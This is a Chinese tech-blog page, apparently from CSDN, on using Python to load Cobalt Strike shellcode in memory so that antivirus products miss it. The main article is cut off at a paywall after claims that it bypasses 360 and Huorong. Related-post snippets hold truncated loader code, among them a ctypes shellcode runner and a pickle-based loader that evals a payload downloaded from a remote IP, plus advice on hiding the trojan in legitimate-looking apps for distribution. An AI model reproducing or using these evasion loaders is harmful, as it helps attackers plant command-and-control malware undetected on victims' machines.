python3内存加载cs shellcode实现免杀

最新推荐文章于 2025-03-27 16:48:50 发布
最新推荐文章于 2025-03-27 16:48:50 发布
阅读量2.2k 收藏 1
点赞数 1
分类专栏: 渗透测试 提权 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39997096/article/details/110554468
版权

前言:

最近看到很多利用加载器来加载shellcode来实现免杀的思路,前段时间本公众号还推了一个j0师傅的golang加载器,大家用了过后是不是感觉效果都不错?今天本文来利用python来作为加载器来实现免杀的效果。

 

先说说效果:

经本地测试免杀360全家桶+火绒。

 

当然免杀的不止这些,其余的没有本地测试,放微步、vs、vt等平台上去跑了。

微步检出率(3/25)

 

vs检出率(4/49)

 

vt检出率(16/69)

 

从上述检测结果来看,国内主流的杀软都过了,检出的基本上都是那几款国外的,在国内用的不多的杀软。

 

另外windows defender免杀不了~不过在win10中有一个“

最低0.47元/天 解锁文章
cs-使用python进行
m0_53087192的博客
02-08 1992
环境 使用python版本为python3.6 32位版本,64位版本测试会报错。 安装pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 生成shellcode 使用cobalsstrike生成c语言shellcode。 使用shellcode loader加载shellcode #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x
2024年Python最新【】分离python)_shellcode loader
2401_84585462的博客
05-01 607
import sysf.close()loader加密。
shellcode ——python3
时光凉春衫薄的博客
12-28 1942
python shellcode 上线
内网渗透-CS与应用开发
最新发布
zj2084的博客
03-27 843
再做上面那一步的操作之前,我们先将这段加载器代码放到我们的csshellenc.py里面,将csshellenc.py里面的加密代码先给注释了,看看可不可以上线,也就是看看加载器代码有没有区别。然后在Kali启动我们的客户端,打开cobaltstrike的界面,建立与我们的公网服务器的来连接,端口是50050,用户名随便输,密码是我们刚刚启动teamserver的密码。代码我们已经搞定了,我们该如何去包装一下这个木马,把这个木马包装到正儿八经的应用程序当中去,然后再去做分发。
方法(四)Pythonshellcode加载
qq_56426046的博客
10-03 1333
方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
python生成shellcode加载器(,可过软)
u010508029的博客
05-31 3925
import ctypes, cPickle, base64, urllib2 class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64 class buf(object): def __init__(self, shellcode): sel.
学习笔记1:python实现shellcode加载
nglj9527的博客
01-02 6106
python实现shellcode加载器名词解释代码 名词解释 shellcode:一段可以由电脑直接执行的机器码,执行后可以搭建起stranger。 加载器:将shellcode加载内存,并开始执行的程序。 代码 import ctypes import base64 import requests shellcode = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\
shellcode加密
longwanlian的博客
08-04 754
先说结论,笔者没成功过360。
Python远程加载分离、反序列化
qq_43606723的博客
08-15 1861
shellcode.py远程加载反序列化手法
基于python的简单
2301_76232299的博客
11-21 2037
本次文章只用于技术讨论,学习,切勿用于非法用途。
python 执行shellcode_各种语言实现Shellcode加载(暂时两种)
weixin_39612817的博客
01-28 716
原理:使用Shellcode加载器分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合加密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态是过不了的参考资料C/C++语言实现Shellcode加载Shellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
Python-halo用Python实现一个漂亮的终端加载
08-10
halo 用Python实现一个漂亮的终端加载
支持64位系统的XOR加密后内存加载PE绕过毒软件
liujiayu2的专栏
09-14 1225
http://bbs.pediy.com/showthread.php?t=203910 绝对自动支持32、64位的内存加载源码 无聊逛看雪时,看到了这个。 然后到github上找到了源。就是这里:https://github.com/fancycode/MemoryModule 结合我几年前写的一个利用方法:https://github.com/eric21/MemPE 使
[]基于pythonshellcode&loader原理研究
3tefanie丶zhou的博客
03-30 4777
【此身原本不知愁,最怕万一见温柔】
cs linux内网渗透,GitHub - H4ckForJob/SharpToolsAggressor: 内网渗透中常用的c#程序整合成cs脚本,直接内存加载。持续更新~...
weixin_27729671的博客
05-15 375
SharpToolsAggressorSharpEventLog: Windows Login EventLogGet Windows Login EventLog:Login success:4624 And Login Failure:4625c# 读取登录过本机的登录失败或登录成功(4624,4625)的所有计算机信息,在内网渗透中快速定位运维管理人员。https://github.com/...
Python配置文件加载
Leon_Jinhai_Sun的博客
07-08 189
Python配置文件加载
[]基于python的mac加载
3tefanie丶zhou的博客
04-08 527
【心心念念人相隔远远方,人在远方,也在心乡。】
python加载器_类加载器详解
weixin_35762258的博客
02-04 769
加载器是负责将可能是网络上、也可能是磁盘上的class文件加载内存中。并为其生成对应的java.lang.class对象。一旦一个类被载入JVM了,同一个类就不会被再次加载。那么怎样才算是同一个类?在JAVA中一个类用其全限定类名(包名和类名)作为其唯一标识,但是在JVM中,一个类用其全限定类名和其类加载器作为其唯一标识。也就是说,在JAVA中的同一个类,如果用不同的类加载加载,则生成的cl...
python加载器_利用Python反序列化运行加载实现
weixin_36266554的博客
02-04 592
前言前几天在看Pythonshellcode加载器,在网上找了一个,结果加载器自身就过不了火绒,测试发现是火绒对关键语句进行了识别。 所以我们要想办法去掉加载器中明显的特征。原理及实现在绕过静态查方面,主要就是要隐藏特征,比较常见的就是各种混淆、加密,但加密后的代码到最终还是需要去执行它才行,代码执行这一个操作其实特征也是很明显的,像exec、eval、os.system、subprocess...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值